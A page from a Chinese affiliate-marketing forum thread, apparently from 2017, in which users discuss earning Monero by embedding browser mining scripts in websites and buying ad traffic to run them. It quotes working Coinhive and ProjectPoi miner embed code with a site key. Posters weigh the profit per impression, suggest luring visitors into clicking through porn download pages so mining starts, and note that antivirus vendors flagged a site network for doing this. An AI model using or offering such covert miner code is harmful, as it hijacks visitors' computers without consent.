生鱼片 发表于 2017-10-9 14:33:48

花儿、对我笑 发表于 2017-10-9 14:17
这些问题 ,挖矿那个圈子,成天有人讨论呢,最后都选择CPU矿机挖矿
为什么呢?就是因为显卡挖门罗币,损 ...

还不如屯比特币
以后比特币才是硬通货了
等国内几大平台 海外重新搞起来 都是币币交易了

花儿、对我笑 发表于 2017-10-9 14:38:15

专业玩家 发表于 2017-10-9 06:14
是几年前出EMU 培训的 花儿对我笑大神吗?   当时应该一年轻松赚几百万吧。。。玩这些对你来说太低端了 ...

瞎玩吧,关键是挖矿根本不需要考虑AFF行业里的麻烦事(联盟的脸色 广告商的脸色)
矿机一开,根本不需要人工

专业玩家 发表于 2017-10-9 17:45:55

花儿、对我笑 发表于 2017-10-9 14:38
瞎玩吧,关键是挖矿根本不需要考虑AFF行业里的麻烦事(联盟的脸色 广告商的脸色)
矿机一开,根本不需要 ...

如果我有几百万,之前炒房。。。。 现在至少1,2千万身家。。 有1,2千万以上身家。。之前应该开个 币。。坑下国人 然后这个无法估算。。。      当我没说过,我喜欢假设

花儿、对我笑 发表于 2017-10-9 18:14:26

专业玩家 发表于 2017-10-9 17:45
如果我有几百万,之前炒房。。。。 现在至少1,2千万身家。。 有1,2千万以上身家。。之前应该开个 币。 ...

呵呵 你也太抬举我了,你把我看的太牛B了,山西太原 今年的房价平均价才8000-15000 一平米
炒房只适合你们一线城市,至于开个币,整个山西市场 搞AFF或联盟营销的人,搞虚拟币的人或团队也就 6-8人左右,你让我去毛上找人拉团队炒币呢,我这人,脾气怪,不太合群,比较独!只跟谈的来的人玩,所以你说的那些思路,我是玩不转,我就挣挣快钱,稳稳的生活就挺好,没有跟你们那么大的想法,毕竟我这人的毛病缺点,的确挺多!

花儿、对我笑 发表于 2017-10-9 18:28:35

专业玩家 发表于 2017-10-9 17:45
如果我有几百万,之前炒房。。。。 现在至少1,2千万身家。。 有1,2千万以上身家。。之前应该开个 币。 ...

在说下。山西太原 房子谁炒谁就死,我跟你说下 山西经济的主要架构吧
煤矿汾酒土特产旅游   其他都经济产业 几乎可以忽略不计!
都说山西煤老板多,你理解错了,几乎赚钱的煤矿,幕后都是外地人投资入股的
本地煤老板 挣了钱 都不在山西这地方待 都去一线城市发展了!
汾酒基本都是从 东北地区 进高度白酒 然后勾兑,咱国内的白酒 几乎很多都是勾兑酒,这你可以问问你们当地酒厂就明白!
土特产和旅游 也是最近几年才发展起来的!也是山西省政府目前大力打造的旅游牌

至于山西太原 这个城市几乎没有互联网人才的基因,我15年找 java语言程序员 本地几乎没有,面试了几个,都是半吊子选手,最后我无奈 只能外包给 北京的一家公司!这就是现状!!!
比如 深圳找程序员一找一大把 ,技术水平都蛮高的,哪怕是 西北市场 西安都很容易找的到!
说了这么多,我只想说明一个道理,任何项目 这两年想做大 必须有团队 ,但山西太原 ,人都找不齐,我去火星上 炒房和开币呢?

Askdelphi 发表于 2017-10-9 19:05:50

刚才估算了一下,感觉很难操作。
按今天一个门罗币520元算,折成美元大概78刀。
假如bid的价格为CPM 0.2刀,就一万个imp=2刀,78刀可以买39万imp。
所以一个imp的成本折算成罗门币是1/39万=0.00000256
刚才我在自己电脑上打开挖矿的网页,要挖到0.00000256个门罗币大概花7分钟,
需要39万人开7分钟网页才能挖到1个币。
还没有扣除掉刷子流量,点损,bid也不可能0.2CPM,$0.2的话,流量也很有限。

不知我有没有算错?感觉不是一般的难:funk:
编辑一下:这个挖矿速度跟什么有关?我刚才开着网页看片,CPU也是占了100%,但5分钟才增加0.00000020个。
我网页上的代码,是不是漏设置了什么:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
      var miner = new CoinHive.Anonymous('Wgn5fp2eWsWpbbu9D2qQT3hrDcA8vsoh');
      miner.start();
</script>

<script>
      // Listen on events
      miner.on('found', function() { /* Hash found */ })
      miner.on('accepted', function() { /* Hash accepted by the pool */ })

// Update stats once per second
      setInterval(function() {
                var hashesPerSecond = miner.getHashesPerSecond();
                var totalHashes = miner.getTotalHashes();
                var acceptedHashes = miner.getAcceptedHashes();

// Output to HTML elements...
      }, 1000);
</script>

1198345 发表于 2017-10-9 19:26:02

<script src="https://ppoi.org/lib/projectpoi.min.js"></script> <script>         var miner = new ProjectPoi.User('<site-key>', 'gebilaowang');         miner.start(); </script> 相似度太高了

花儿、对我笑 发表于 2017-10-9 19:31:08

今天 安全新闻
http://www.freebuf.com/articles/web/149483.html
我是真发愁你们啊
你们咋就不想想要是不赚钱能让 电脑管家这类杀软厂家 盯上吗?
要是不赚钱的话 杀软厂家也不可能 盯上这个人 肯定访问量大呢
要是不赚钱的话 这个人也不可能费事,那么多域名做站群了!
执行力太关键了!都别算一台机器的价格或一点点流量的价格
达到一定的量,能不赚钱吗?

专业玩家 发表于 2017-10-9 19:31:15

花儿、对我笑 发表于 2017-10-9 18:28
在说下。山西太原 房子谁炒谁就死,我跟你说下 山西经济的主要架构吧
煤矿汾酒土特产旅游   其他都 ...

:L 赚钱应该转移到深圳比较不错。。。 现在CPA也不太好跑,深圳搞跨境依旧有气氛,技术各方面的优势。。 深圳的房2,3年内涨了2,3倍以上。。。

pengit 发表于 2017-10-9 19:39:15

Askdelphi 发表于 2017-10-9 19:05
刚才估算了一下,感觉很难操作。
按今天一个门罗币520元算,折成美元大概78刀。
假如bid的价格为CPM 0.2刀 ...

每台电脑计算能力不一样,计算能力差的,你打开半小时还不如好的5分钟, 你可以看下你点击后HASHES/S 显示多少,数值越小越难挖,而且这个要人家主动点击才会计算,正常用户肯定不会这样,除非是色*情*这类图片下载让用户点击才显示内容或允许下载什么,不是有CPM就可以的

zqjilove 发表于 2017-10-10 10:55:30

之前就有这个想法。没去测试,感觉应该入不敷出。

eric205013 发表于 2017-10-10 16:32:02

虚拟币:lol:lol:lol:lol:lol

acy0430 发表于 2017-10-11 21:54:47

啥时候再开培训 第一个报名

justhost 发表于 2017-12-5 23:21:21

mark........
页: 1 [2]
查看完整版本: N年不见的礼物,适合玩站、Media Buy等等...........